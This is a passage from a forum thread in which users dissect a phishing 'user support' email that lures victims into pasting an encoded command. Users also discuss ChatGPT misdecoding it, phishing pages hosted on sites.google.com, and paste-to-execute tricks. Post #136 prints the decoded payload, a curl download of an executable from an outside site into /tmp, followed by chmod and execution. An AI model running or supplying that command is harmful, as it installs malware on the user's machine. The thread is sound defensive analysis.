Earlier quoted context omitted.
Better yet - ChatGPT didn't actually decode the blob accurately. It nails the URL, but manages somehow to get the temporary filename completely wrong (the actual filename is /tmp/pjKmMUFEYv8AlfKR, but ChatGPT says /tmp/lRghl71wClxAGs). It's possible the screenshot is from a different payload, but I'm more inclined to believe that ChatGPT just squinted and made up a plausible /tmp/ filename. In this case it doesn't ma…
Very common for these sorts of things to give different payloads to different user agents.
The scariest "user support" email I've received
131–140 of 267 posts
Re: The scariest "user support" email I've received
#132> as ChatGPT confirmed when I asked it to analyze it lol we are so cooked
just feed the thing to any base64 decoder like cyberchef: https://cyberchef.org/#recipe=From_Base64('A-Za-z0-9%2B/%3D'... Isn't it just basic problem solving skill? We gonna let AI do the thinky bit for us now?
Re: The scariest "user support" email I've received
#133I'm seeing a lot more of these phishing links relying on sites.google.com . Users are becoming trained to look at the domain, which appears correct to them. Is it a mistake of Google to continue to let people post user content on a subdomain of their main domain?
Re: The scariest "user support" email I've received
#134> as ChatGPT confirmed when I asked it to analyze it lol we are so cooked
Re: The scariest "user support" email I've received
#135Only difference is that it downloaded a .zip file containing a shortcut (.lnk) file which contained commands to download and execute the malicious code.
Re: The scariest "user support" email I've received
#136Earlier quoted context omitted.
Isn't analysing and writing bits of code one of the few things LLMs are actually good at and useful for (as opposed to creative writing or whatever). Before LLMs if someone wasn't familiar with deobfuscation they would have no easy way to analyse the attack string as they were able to do here.
The "old fashioned" way was to post on an internet message board or internet chatroom and let someone else decode it.
Decoded:
curl -sL -o /tmp/pjKmMUFEYv8AlfKR https://www.amanagencies.com/assets/js/grecaptcha;
chmod +x /tmp/pjKmMUFEYv8AlfKR;
/tmp/pjKmMUFEYv8AlfKR
This isn't exactly obfuscated. Download an executable file, make it executable, and then execute it.Re: The scariest "user support" email I've received
#137Re: The scariest "user support" email I've received
#138I'm seeing a lot more of these phishing links relying on sites.google.com . Users are becoming trained to look at the domain, which appears correct to them. Is it a mistake of Google to continue to let people post user content on a subdomain of their main domain?
Re: The scariest "user support" email I've received
#139In Windows CMD you don’t even need to hit return at the end. They can just add a line break to the copied text and as soon as you paste into the command line (just a right click!), you own yourself. I have one question though: Considering the scare-mongering about Windows 10’s EOL, this seems pretty convoluted. I thought bad guys could own your machine by automatic drive-by downloads unless you’re absolutely on the l…
I'm sure "visit a site and get exploited" happens, but... I haven't actually heard of a single concrete case outside of nation-state attacks. What's more baffling is that I also haven't heard of any Android malware that does this, despite most phones out there having several publicly known exploits and many phones not receiving any updates. I can't really explain it except "social engineering like this works so well…
Re: The scariest "user support" email I've received
#140Earlier quoted context omitted.
Running it through ChatGPT and asking for its thoughts is a free action. Base64 decoding something that I know to be malicious code that's trying to execute on my machine, that's worrisome. I may do it eventually, but it's not the first thing I would like to do. Really I would prefer not to base64 decode that payload at all, if someone who can't accidentally execute malicious code could do it, that sounds preferable.…
Huh? How would decoding a base64 string accidentally run the payload?
When I come across obviously malicious payloads I get a little paranoid. I don't know why copy-pasting it somewhere might cause a problem, but ChatGPT is something where I'm pretty confident it won't do an RCE on my machine. I have less confidence if I'm pasting it into a browser or shell tool. I guess maybe writing a python script where the base64 is hardcoded, that seems pretty safe, but I don't know what the person spear phishing me has thought of or how well resourced they are.